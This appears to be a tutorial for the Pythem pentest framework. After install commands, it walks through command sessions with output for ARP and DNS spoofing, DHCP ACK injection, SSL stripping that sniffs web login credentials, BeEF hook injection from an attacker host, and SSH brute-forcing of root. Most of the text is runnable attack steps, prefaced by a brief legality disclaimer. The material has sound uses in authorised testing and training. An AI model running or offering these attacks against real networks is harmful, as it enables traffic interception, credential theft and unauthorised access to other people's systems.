
Pythem is a multi-purpose pentest framework written in Python. It has been developed to be used by security researchers and security professionals. The tool intended to be used only for acts within the law.
Features –
- Only runs on GNU/Linux OS.
- Based on Python
- Easy to install and use
Supported attacks –
- ARP spoofing – Man-in-the-middle (MITM).
- Man-in-the-middle HSTS bypass – Strip SSL
- ARP+DNS spoof – fake page redirect to credential harvester
- DHCP ACK Injection spoofing – Man-in-the-middle
- Man-in-the-middle inject BeEF hook
- SSH Brute-Force attack.
- Web page formulary brute-force
- URL content buster
- Overthrow the DNS of LAN range/IP address
- Redirect all possible DNS queries to host
This tool is very useful for specially DOS and MITM attacks over LAN network. You can easily define the target, gateway and interface etc
Installation of Pythem –
Installation can be done via git clone by typing this command:
Command: git clone https://github.com/m4n3dw0lf/pythem
Before to run, we have to give full permissions to install executable binary file because we need to install some dependencies which you can easily find from requirements.txt file.
For permissions, the command is “chmod +x install“.
After complete installation, just type “pythem” in your terminal.
To view all commands and information about pythem, just type help in same terminal.
ARP spoofing – Man-in-the-middle
pythem> set interface eth0
pythem> set gateway 192.168.179.2
pythem> arpspoof start
pythem> sniff
[+] Enter the filter: core
ARP+DNS spoof – fake page redirect to credential harvester
pythem> set target 192.168.179.142
pythem> set interface eth0
pythem> set gateway 192.168.179.2
pythem> arpspoof start
[+] Setting the packet forwarding.
[+] Iptables redefined.
[+] ARP spoofing initialized.
pythem> dnsspoof start
[!] Type all to spoof all domains
[+] Domain to be spoofed: example.com
[+] Default address to redirect is:192.168.0.6 do you want to change?[y/n]n
[+] DNS spoofing initialized.
pythem> sniff core
Man-in-the-middle DHCP spoofing – DHCP ACK Injection
pythem> dhcpspoof start
[+] DHCP Server IP address: 192.168.1.1
[+] Broadcast address: 192.168.1.255
[+] Subnet mask: 255.255.255.0
[+] Router IP address: 192.168.1.1
[+] Domain: home
[+] DNS Server IP address: 192.168.1.4 (fake)
[+] DHCP spoofing initialized.
pythem> sniff core
Man-in-the-middle HSTS bypass – Strip SSL
pythem> set interface eth0
pythem> set gateway 192.168.179.2
pythem> set target 192.168.179.142
pythem> hstsbypass
pythem> sniff core
As soon as in target machine when someone login to gmail.com or any other https based site, it will sniff the login credentials in clear text as shown below:
Man-in-the-middle inject BeEF hook
Start BeEF xss framework and get the hook script url
pythem> set interface eth0
pythem> set target 192.168.179.142
pythem> set gateway 192.168.179.2
pythem> arpspoof start
[*] Iptables redefined
[*] Setting the packet forwarding.
[+] ARP spoofing initialized.
pythem> redirect start
[+] Enter the script source: http://192.168.179.145:3000/hook.js
[+] Redirect with script injection initialized.
[+] Injection URL – http://192.168.179.145:80
[+] Target was requesting: waccounts.google.com
[+] Script Injected on: (‘192.168.179.1’, 27813)
SSH Brute-Force attack
pythem> service ssh start
pythem> set target
[+] Enter the target(s): 127.0.0.1
pythem> set file wordlist.txt
pythem> brute ssh
[+] Enter the username to bruteforce: root